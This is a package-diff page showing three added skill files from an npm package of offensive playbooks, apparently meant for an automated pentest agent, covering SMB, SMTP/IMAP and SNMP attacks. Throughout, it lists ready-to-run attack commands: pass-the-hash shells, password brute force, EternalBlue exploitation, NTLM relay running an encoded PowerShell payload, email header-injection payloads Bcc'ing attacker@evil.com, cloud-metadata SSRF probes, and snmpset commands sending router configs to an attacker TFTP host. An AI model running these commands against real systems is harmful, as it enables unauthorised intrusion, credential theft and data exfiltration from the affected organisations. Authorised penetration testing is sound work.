npm - @aegis-scan/skills - Versions diffs - 0.4.0 → 0.5.1 - Mend

@aegis-scan/skills 0.4.0 → 0.5.1

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (386) hide show

package/skills/offensive/airecon-fork/protocols-smb/SKILL.md ADDED Viewed

@@ -0,0 +1,191 @@
+<!-- aegis-local: forked 2026-05-04 from pikpikcu/airecon@9a21453459d87eefb012ea355c79b593d0d3c0cc (MIT-licensed); attribution preserved, see ATTRIBUTION.md -->
+---
+name: smb
+description: SMB/NetBIOS security testing — null session, share enumeration, EternalBlue, pass-the-hash, relay attacks, crackmapexec, smbclient, and SMB-specific CVEs
+---
+# SMB / NetBIOS Security Testing
+SMB (Server Message Block) = Windows file sharing protocol. Critical attack surface: null sessions, share enumeration, EternalBlue (MS17-010), pass-the-hash, NTLM relay, and credential brute force.
+**Install:**
+```
+sudo apt-get install -y smbclient smbmap crackmapexec enum4linux-ng rpcclient impacket-scripts
+pip install impacket --break-system-packages
+# netexec (newer crackmapexec):
+pip install netexec --break-system-packages
+```
+**Ports:** 139 (NetBIOS), 445 (SMB direct)
+---
+## Reconnaissance
+    nmap -p 139,445 <target> -sV --open
+    nmap -p 445 <target> --script smb-security-mode,smb-enum-shares,smb-vuln-ms17-010
+    # OS + version detection:
+    crackmapexec smb <target>
+    # Returns: OS version, hostname, domain, signing status
+---
+## Null Session / Anonymous Access
+    # smbclient — null session (no credentials):
+    smbclient -L //<target>/ -N             # List shares, no password
+    smbclient //<target>/share -N           # Connect to share
+    # smbmap — check share permissions:
+    smbmap -H <target>                      # Null session
+    smbmap -H <target> -u "" -p ""         # Explicit null
+    # enum4linux-ng — comprehensive enumeration:
+    enum4linux-ng <target>                  # All info (users, shares, policies)
+    enum4linux-ng -A <target>               # All checks
+    # rpcclient — null session:
+    rpcclient -U "" -N <target>
+    rpcclient> enumdomusers                 # List domain users
+    rpcclient> enumdomgroups                # List groups
+    rpcclient> querydominfo                 # Domain info
+    rpcclient> netshareenum                # Shares
+---
+## Authenticated Enumeration
+    # smbclient with credentials:
+    smbclient -L //<target>/ -U "domain\\username%password"
+    smbclient //<target>/C$ -U "admin%password"   # Admin share
+    # smbmap:
+    smbmap -H <target> -u username -p password
+    smbmap -H <target> -u username -p password -r sharename    # Recursive list
+    smbmap -H <target> -u username -p password --download 'sharename\path\file.txt'
+    # crackmapexec:
+    crackmapexec smb <target> -u username -p password --shares
+    crackmapexec smb <target> -u username -p password --users
+    crackmapexec smb <target> -u username -p password --groups
+    crackmapexec smb <target> -u username -p password --sessions
+    crackmapexec smb <target> -u username -p password -x "whoami"   # Execute command
+---
+## Pass-the-Hash (PTH)
+NTLM authentication can use hash directly — no plaintext password needed:
+    # smbclient with NTLM hash:
+    smbclient //<target>/C$ -U "administrator" --pw-nt-hash <NTLM_hash>
+    # crackmapexec PTH:
+    crackmapexec smb <target> -u administrator -H <NTLM_hash>
+    crackmapexec smb <target> -u administrator -H <NTLM_hash> -x "whoami"
+    # impacket psexec (full shell):
+    psexec.py administrator@<target> -hashes :<NTLM_hash>
+    # impacket wmiexec:
+    wmiexec.py administrator@<target> -hashes :<NTLM_hash>
+    # impacket smbexec:
+    smbexec.py administrator@<target> -hashes :<NTLM_hash>
+---
+## Brute Force
+    # crackmapexec credential spray:
+    crackmapexec smb <target> -u users.txt -p passwords.txt --continue-on-success
+    crackmapexec smb <target> -u administrator -p /usr/share/wordlists/rockyou.txt
+    # hydra:
+    hydra -l administrator -P /usr/share/wordlists/rockyou.txt smb://<target>
+---
+## EternalBlue — MS17-010 (Windows 7/2008R2 without patch)
+    # Check vulnerability:
+    nmap -p 445 --script smb-vuln-ms17-010 <target>
+    crackmapexec smb <target> -M ms17-010
+    # Metasploit:
+    use exploit/windows/smb/ms17_010_eternalblue
+    set RHOSTS <target>
+    set LHOST <attacker>
+    run
+    # Python exploit (no Metasploit):
+    # git clone https://github.com/helviojunior/MS17-010 /home/pentester/tools/MS17-010
+    python3 /home/pentester/tools/MS17-010/send_and_execute.py <target> shell.exe
+---
+## SMB Relay Attack (NTLM Relay)
+If SMB signing is DISABLED on target (common on workstations):
+    # Step 1: Check signing status:
+    crackmapexec smb <network>/24 --gen-relay-list relay_targets.txt
+    nmap -p 445 --script smb-security-mode <target> | grep "message signing"
+    # Step 2: Setup Responder (capture NTLM hashes):
+    # Edit /etc/responder/Responder.conf → SMB = Off, HTTP = Off (relay mode)
+    sudo responder -I eth0 -dwP
+    # Step 3: Relay with impacket:
+    sudo ntlmrelayx.py -tf relay_targets.txt -smb2support
+    # When victim authenticates → relay to target → get shell or dump SAM
+    # With command execution:
+    sudo ntlmrelayx.py -tf relay_targets.txt -smb2support -c "powershell -enc <b64_payload>"
+---
+## CVE Coverage
+| CVE | Name | Impact |
+|-----|------|--------|
+| CVE-2017-0144 | EternalBlue | RCE (MS17-010) |
+| CVE-2020-0796 | SMBGhost | RCE (SMBv3.1.1) |
+| CVE-2021-36942 | PetitPotam | NTLM relay via EFS |
+| CVE-2022-26925 | PrintNightmare (LS) | NTLM relay |
+    # SMBGhost check:
+    nmap -p 445 --script smb-vuln-cve-2020-0796 <target>
+---
+## Sensitive File Access
+    # Once share access obtained:
+    smbclient //<target>/C$ -U "admin%pass"
+    smb> ls
+    smb> get SAM                    # C:\Windows\System32\config\SAM (need SYSTEM too)
+    smb> get SYSTEM
+    smb> recurse ON
+    smb> prompt OFF
+    smb> mget *                     # Download all files
+    # Secretsdump from SAM + SYSTEM:
+    secretsdump.py LOCAL -sam SAM -system SYSTEM -ntds NTDS.dit
+---
+## Pro Tips
+1. `crackmapexec smb <subnet>/24` scans entire subnet for SMB hosts and their OS versions
+2. SMB signing disabled = relay attack possible — check with `crackmapexec --gen-relay-list`
+3. Pass-the-hash via `crackmapexec -H` — no cracking required if you have the hash
+4. `smbmap -H target -r` recursively lists all readable shares — often finds sensitive docs
+5. EternalBlue still active on unpatched Windows 7/2008R2 — always check with nmap script
+6. `enum4linux-ng` reveals domain users, password policies, and group memberships anonymously
+## Summary
+SMB testing: null session (`smbclient -N`) → share enumeration (`smbmap`, `enum4linux-ng`) → credential brute (`crackmapexec`) → pass-the-hash (`crackmapexec -H`, `psexec.py`) → EternalBlue check (`nmap smb-vuln-ms17-010`) → SMB relay if signing disabled (`ntlmrelayx.py`).

package/skills/offensive/airecon-fork/protocols-smtp-imap/SKILL.md ADDED Viewed

@@ -0,0 +1,263 @@
+<!-- aegis-local: forked 2026-05-04 from pikpikcu/airecon@9a21453459d87eefb012ea355c79b593d0d3c0cc (MIT-licensed); attribution preserved, see ATTRIBUTION.md -->
+---
+name: smtp-imap
+description: SMTP and IMAP security testing covering open relay, email header injection, user enumeration, credential brute force, and SMTP as SSRF pivot
+---
+# SMTP / IMAP Security Testing
+Email protocols are often overlooked but are critical attack surface in pentests. Attack surface: open relay (spam pivot), SMTP user enumeration, email header injection (phishing pivot), credential brute force, and SMTP as SSRF vector.
+---
+## Reconnaissance
+### Discovery
+    # Port scanning for email services
+    nmap -p 25,465,587,110,143,993,995 <target> -sV --open
+    # Ports:
+    # 25   — SMTP (submission/relay)
+    # 465  — SMTPS (SMTP over TLS — legacy)
+    # 587  — Submission (authenticated SMTP)
+    # 110  — POP3
+    # 143  — IMAP
+    # 993  — IMAPS (IMAP over TLS)
+    # 995  — POP3S (POP3 over TLS)
+### Banner Grabbing
+    nc <target> 25
+    EHLO test.com
+    # Server responds with capabilities: AUTH, STARTTLS, SIZE, etc.
+    # Capture banner
+    nmap -p 25 <target> --script smtp-commands,smtp-open-relay,smtp-ntlm-info
+---
+## SMTP User Enumeration
+Three methods: VRFY, EXPN, RCPT TO (most common):
+### VRFY Method
+    # VRFY verifies if a user exists
+    nc <target> 25
+    EHLO attacker.com
+    VRFY root               # "252 2.0.0 root" = valid | "550 5.1.1" = invalid
+    VRFY admin
+    VRFY postmaster
+### EXPN Method
+    # EXPN expands a mailing list (often more verbose)
+    nc <target> 25
+    EHLO attacker.com
+    EXPN admin              # "250 admin@domain.com" = valid
+    EXPN mailing-list       # Lists all members
+### RCPT TO Method (Most Common — Works When VRFY/EXPN Disabled)
+    # Send an email to each username — different responses for valid vs invalid
+    nc <target> 25
+    EHLO attacker.com
+    MAIL FROM: <test@attacker.com>
+    RCPT TO: <admin@target.com>    # "250 OK" = valid | "550 User unknown" = invalid
+    RCPT TO: <root@target.com>
+### Automated Enumeration
+    # smtp-user-enum
+    smtp-user-enum -M VRFY -U /usr/share/wordlists/usernames.txt -t <target>
+    smtp-user-enum -M RCPT -U /usr/share/seclists/Usernames/top-usernames-shortlist.txt -t <target> -D target.com
+    # nmap script
+    nmap --script smtp-enum-users <target> -p 25
+    # Metasploit
+    use auxiliary/scanner/smtp/smtp_enum
+---
+## Open Relay Testing
+Open relay = SMTP server relays email from any source to any destination (spam abuse, phishing pivot):
+    # Manual test: attempt to relay email through target
+    nc <target> 25
+    EHLO test.com
+    MAIL FROM: <attacker@evil.com>
+    RCPT TO: <victim@gmail.com>       # External domain — should be rejected
+    DATA
+    From: attacker@evil.com
+    To: victim@gmail.com
+    Subject: Relay Test
+    This is a test.
+    .
+    QUIT
+    # If "250 OK" after RCPT TO and DATA → open relay confirmed
+    # nmap automatic check
+    nmap --script smtp-open-relay <target> -p 25
+    # Test all relay bypass techniques:
+    RCPT TO: <victim@gmail.com>
+    RCPT TO: <@target.com:victim@gmail.com>      # Old source routing
+    RCPT TO: <victim%gmail.com@target.com>       # Percent-encoded
+    RCPT TO: <"victim@gmail.com">                # Quoted
+    RCPT TO: <victim@gmail.com@target.com>       # Double domain
+---
+## Email Header Injection
+When user input (name, email, subject) is included directly in email headers:
+    # Vulnerable: name field used directly in From: header
+    # Inject CRLF + new headers:
+    # Basic injection (name field):
+    "attacker\r\nBcc: victim@target.com"
+    "attacker\nCC: victim2@target.com"
+    # Complete additional message injection:
+    "attacker\r\nCc: victim@target.com\r\nBcc: external@attacker.com"
+    # Subject line injection:
+    "Normal Subject\r\nTo: victim@evil.com"
+    # Test all input fields in contact forms, registration emails, password reset:
+    name: "Test\r\nBcc: attacker@evil.com"
+    email: "user@example.com\r\nBcc: attacker@evil.com"
+---
+## SMTP Authentication Brute Force
+    # Using hydra
+    hydra -l admin@target.com -P /usr/share/wordlists/rockyou.txt smtp://<target> -V -s 587
+    hydra -L users.txt -P passwords.txt smtp://<target>:587 -S   # SSL
+    # Medusa
+    medusa -h <target> -u admin@target.com -P /usr/share/wordlists/rockyou.txt -M smtp -n 587
+    # nmap brute
+    nmap --script smtp-brute -p 25 <target>
+---
+## IMAP Enumeration and Brute Force
+    # Manual IMAP connection
+    nc <target> 143
+    a001 CAPABILITY                    # List capabilities
+    a002 LOGIN user@domain.com pass    # Authenticate
+    # With IMAPS (TLS):
+    openssl s_client -connect <target>:993 -quiet
+    a001 CAPABILITY
+    a002 LOGIN user@domain.com pass
+    # After auth — list and read mailboxes:
+    a003 LIST "" "*"                   # List all folders
+    a004 SELECT INBOX                  # Select inbox
+    a005 FETCH 1:* (ENVELOPE)         # List all messages
+    a006 FETCH 1 BODY[]               # Read first message (full)
+    a007 FETCH 1 BODY[HEADER]         # Headers only
+    # Brute force IMAP:
+    hydra -l user@domain.com -P /usr/share/wordlists/rockyou.txt imap://<target>
+    hydra -L users.txt -P pass.txt imaps://<target>
+---
+## SMTP as SSRF Vector
+When a web app allows configuring SMTP server or sending emails, use it as SSRF:
+    # Test internal SMTP (if web app has "email settings" configuration):
+    SMTP Host: 169.254.169.254    # AWS IMDS
+    SMTP Host: localhost
+    SMTP Host: 127.0.0.1:22      # Port probe
+    SMTP Host: 127.0.0.1:6379    # Redis probe
+    # SMTP for port scanning internal network:
+    SMTP Host: 10.0.0.1   Port: 22   → connection refused vs timeout = port state
+---
+## STARTTLS Strip / Downgrade
+    # Test if STARTTLS is enforced or can be stripped:
+    nc <target> 587
+    EHLO test.com
+    # If server lists STARTTLS but allows plaintext auth:
+    AUTH PLAIN <base64(user:pass)>    # Without STARTTLS — plaintext credential exposure
+    # nmap check:
+    nmap --script smtp-starttls-helo <target> -p 587
+---
+## SMTP Information Disclosure
+    # NTLM information disclosure via AUTH NTLM:
+    nc <target> 25
+    EHLO test.com
+    AUTH NTLM TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA=
+    # Server responds with NTLM challenge revealing: domain name, server name, OS version
+    # nmap script:
+    nmap --script smtp-ntlm-info <target> -p 25,587
+---
+## SPF / DKIM / DMARC Analysis
+    # DNS records — check email authentication policy
+    dig TXT <target.com> | grep -i spf
+    dig TXT _dmarc.<target.com>
+    dig TXT default._domainkey.<target.com>   # DKIM
+    # Missing/weak SPF:
+    # "v=spf1 +all" = anyone can send as domain (critical)
+    # "v=spf1 ... ~all" = softfail (spoofing possible in some cases)
+    # No SPF record = no protection
+    # No DMARC = no enforcement even with SPF/DKIM
+    # DMARC p=none = monitoring only (spoofing emails still deliver)
+    # Test spoofing possibility:
+    # Use swaks or sendemail to test if spoofed email is delivered
+    swaks --to victim@target.com --from ceo@target.com \
+      --server mail.<target.com> --body "Spoofed email test"
+---
+## Key Tools
+    smtp-user-enum      # VRFY/EXPN/RCPT user enumeration
+    swaks               # Swiss Army Knife for SMTP testing
+    hydra               # Auth brute force
+    nmap smtp-*         # Relay, enum, NTLM, open-relay scripts
+    mxtoolbox.com       # Online SPF/DKIM/DMARC analysis
+---
+## Pro Tips
+1. RCPT TO enumeration works even when VRFY and EXPN are disabled — always try it
+2. Open relay allows sending spoofed emails through victim's mail server — instant phishing pivot
+3. Header injection in contact forms is common and enables SPAM/phishing from trusted domain
+4. SMTP NTLM disclosure (AUTH NTLM) reveals internal domain name + server info without credentials
+5. DMARC `p=none` = no rejection of spoofed emails — domain is spoofable for phishing
+6. After compromising SMTP credentials, read IMAP mailbox for plaintext credentials in old emails
+7. SPF `+all` (pass all) is a critical misconfiguration — any server can send as the domain
+## Summary
+SMTP/IMAP testing = open relay check + user enumeration (RCPT TO) + header injection + brute force credentials. Open relay is the most impactful finding — it enables sending phishing emails from the victim's mail server. Header injection in web forms is the most common finding. Always check SPF/DKIM/DMARC for domain spoofing assessment.

package/skills/offensive/airecon-fork/protocols-snmp/SKILL.md ADDED Viewed

@@ -0,0 +1,147 @@
+<!-- aegis-local: forked 2026-05-04 from pikpikcu/airecon@9a21453459d87eefb012ea355c79b593d0d3c0cc (MIT-licensed); attribution preserved, see ATTRIBUTION.md -->
+---
+name: snmp
+description: SNMP security testing — community string enumeration, MIB walking, SNMP v1/v2c/v3 brute force, information disclosure, and device configuration extraction
+---
+# SNMP Security Testing
+SNMP (Simple Network Management Protocol) — device management protocol. Default community strings `public`/`private` grant full read/write access. Exposes: system info, routing tables, running processes, interface IPs, installed software.
+**Install:**
+```
+sudo apt-get install -y snmp snmp-mibs-downloader snmpwalk onesixtyone snmpenum
+pip install snmp-check --break-system-packages
+# snmp-check: sudo apt-get install -y snmp-check
+```
+**Ports:** 161/UDP (agent), 162/UDP (trap)
+---
+## Reconnaissance
+    nmap -p 161 <target> -sU --open -sV
+    nmap -p 161 <target> -sU --script snmp-info,snmp-brute,snmp-sysdescr
+---
+## Community String Brute Force
+    # onesixtyone — fast community string brute:
+    onesixtyone -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt <target>
+    onesixtyone -i targets.txt -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt
+    # Common community strings to try:
+    # public, private, community, manager, admin, cisco, secret, internal, network
+    # nmap:
+    nmap -p 161 -sU --script snmp-brute <target>
+    nmap -p 161 -sU --script snmp-brute --script-args snmp-brute.communitiesdb=/usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt <target>
+    # hydra:
+    hydra -P /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt -v <target> snmp
+---
+## MIB Walking (Data Extraction)
+Once community string found, walk the entire MIB tree:
+    # Full MIB walk:
+    snmpwalk -v 2c -c public <target>                    # Version 2c
+    snmpwalk -v 1 -c public <target>                     # Version 1
+    snmpwalk -v 2c -c public <target> > output/snmp_full.txt
+    # Setup MIBs for human-readable output:
+    sudo apt-get install -y snmp-mibs-downloader
+    sudo download-mibs
+    # Edit /etc/snmp/snmp.conf: comment out "mibs :" line
+    # Specific OID queries:
+    snmpwalk -v 2c -c public <target> 1.3.6.1.2.1.1       # System info
+    snmpwalk -v 2c -c public <target> 1.3.6.1.2.1.25.4.2  # Running processes
+    snmpwalk -v 2c -c public <target> 1.3.6.1.2.1.25.6.3  # Installed software
+    snmpwalk -v 2c -c public <target> 1.3.6.1.2.1.4.20    # IP addresses
+    snmpwalk -v 2c -c public <target> 1.3.6.1.2.1.4.21    # Routing table
+    snmpwalk -v 2c -c public <target> 1.3.6.1.2.1.6.13    # Open TCP ports
+    snmpwalk -v 2c -c public <target> 1.3.6.1.4.1.77.1.2.25  # Windows users
+    # snmpget — specific value:
+    snmpget -v 2c -c public <target> sysDescr.0            # System description
+    snmpget -v 2c -c public <target> sysName.0             # Hostname
+---
+## snmp-check — Automated Comprehensive Enumeration
+    snmp-check <target>                              # Default (public, v2c)
+    snmp-check -c private <target>                   # With private community
+    snmp-check -v 1 -c public <target>               # Force version 1
+    # Output includes:
+    # System info, Hostname, Contact, Location
+    # Network interfaces and IPs
+    # Routing table
+    # Running processes
+    # TCP/UDP open ports
+    # Installed software (Windows)
+    # User accounts (Windows)
+    # Storage info
+---
+## High-Value SNMP Data
+    # Windows user accounts (OID .1.3.6.1.4.1.77.1.2.25):
+    snmpwalk -v 2c -c public <target> .1.3.6.1.4.1.77.1.2.25
+    # Running processes (extract usernames from process list):
+    snmpwalk -v 2c -c public <target> .1.3.6.1.2.1.25.4.2.1.2
+    # Network interfaces + IPs:
+    snmpwalk -v 2c -c public <target> .1.3.6.1.2.1.4.20.1
+    # TCP connections (shows what services connect to what):
+    snmpwalk -v 2c -c public <target> .1.3.6.1.2.1.6.13.1.3
+    # Cisco device — config via SNMP (if write access):
+    snmpset -v 2c -c private <target> .1.3.6.1.4.1.9.2.1.55.0 s "tftp://<attacker>/config"
+---
+## SNMP Write Access (Community = private)
+    # Change system name:
+    snmpset -v 2c -c private <target> sysName.0 s "hacked"
+    # Cisco: copy running-config via TFTP:
+    snmpset -v 2c -c private <target> .1.3.6.1.4.1.9.2.1.55.0 s "tftp://<attacker>/running-config"
+---
+## SNMP v3 Enumeration
+SNMPv3 uses authentication + encryption — more secure but still testable:
+    # Enumerate v3 users:
+    nmap -p 161 -sU --script snmp-brute --script-args snmp-brute.v3authlist=users.txt <target>
+    # braa — fast v3:
+    braa public@<target>:.1.3.6.1.2.1.1.1.0
+---
+## Pro Tips
+1. "public" and "private" work on >60% of SNMP-enabled devices — try these first
+2. SNMP reveals running processes, open ports, and user accounts without any auth on v1/v2c
+3. Cisco/network device SNMP often reveals VPN credentials in process cmdline
+4. Windows SNMP + "public" → `.1.3.6.1.4.1.77.1.2.25` lists local user accounts
+5. Write access with "private" on network gear → extract full device config via TFTP
+6. UDP scan is required (`-sU`) — TCP SNMP is rare; many scanners miss it
+## Summary
+SNMP testing: `nmap -sU -p 161` → `onesixtyone` community brute force → `snmp-check <target>` for full enumeration → `snmpwalk -v 2c -c public` for specific OID mining. Focus on: running processes (credentials in cmdline), user accounts (Windows SNMP), network interfaces, and installed software version fingerprinting.